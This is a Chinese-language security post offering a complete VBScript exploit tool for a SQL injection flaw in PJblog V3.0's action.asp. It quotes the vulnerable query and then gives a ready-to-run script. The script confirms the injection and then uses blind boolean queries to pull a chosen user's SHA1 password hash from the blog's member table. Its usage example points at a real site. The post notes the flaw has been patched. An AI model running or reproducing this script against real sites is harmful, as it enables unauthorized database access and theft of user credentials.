PJblog V3.0 0day Vbs版漏洞利用工具exploit

PJblog V3.0 0day Vbs版漏洞利用工具exploit，本来还算个0day，不过PJblog官方反应速度不错，已经补了

action.asp 第14行

1
strcname=request("cname")
2
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")

漏洞具体细节请看http://0kee.com/read.php?tid-908.html，PJblog V3.0 0day Vbs版漏洞利用工具exploit：

1
If WScript.Arguments.Count <> 2 Then
2
        WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
3
        WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
4
        WScript.Quit
5
End If
6

7
attackUrl = WScript.Arguments(0)
8
attackUser = WScript.Arguments(1)
9
attackUrl = Replace(attackUrl,"","/")
10
If Right(attackUrl , 1) <> "/" Then
11
        attackUrl = attackUrl & "/"
12
End If
13
SHA1Charset = "0123456789ABCDEFJ"
14
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""
15

60 collapsed lines
16
If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then
17
        WScript.Echo "恭喜！存在漏洞"
18
Else
19
        WScript.Echo "没有检测到漏洞"
20
        WScript.Quit
21
End If
22

23
For n=1 To 40
24
        For i=1 To 17
25
                strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"
26
                If Not IsSuccess(strInject) Then
27
                        strResult = strResult & Mid(SHA1Charset, i-1, 1)
28
                        Exit For
29
                End If
30
                strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
31
                WScript.StdOut.Write strPrint
32
        Next
33
Next
34
WScript.Echo Chr(13) & Chr (10) & "Done!"
35

36
Function PostData(PostUrl)
37
 Dim Http
38
 Set Http = CreateObject("msxml2.serverXMLHTTP")
39
 With Http
40
  .Open "GET",PostUrl,False
41
  .Send ()
42
  PostData = .ResponseBody
43
 End With
44
 Set Http = Nothing
45
 PostData =bytes2BSTR(PostData)
46
End Function
47

48
Function bytes2BSTR(vIn)
49
 Dim strReturn
50
 Dim I, ThisCharCode, NextCharCode
51
 strReturn = ""
52
 For I = 1 To LenB(vIn)
53
  ThisCharCode = AscB(MidB(vIn, I, 1))
54
  If ThisCharCode < &H80 Then
55
   strReturn = strReturn & Chr(ThisCharCode)
56
  Else
57
   NextCharCode = AscB(MidB(vIn, I + 1, 1))
58
   strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
59
   I = I + 1
60
  End If
61
 Next
62
 bytes2BSTR = strReturn
63
End Function
64

65
Function IsSuccess(PostUrl)
66

67
strData = PostData(PostUrl)
68
'Wscript.Echo strData
69
if InStr(strData,"check_error") >0 then
70
        IsSuccess = True
71
Else
72
        IsSuccess = False
73
End If
74
'Wscript.Sleep 500 '让系统休息一下
75
End Function

用法：Cscript.exe Exp.vbs 要检测的论坛网址要检测的用户名

来源：WEB安全手册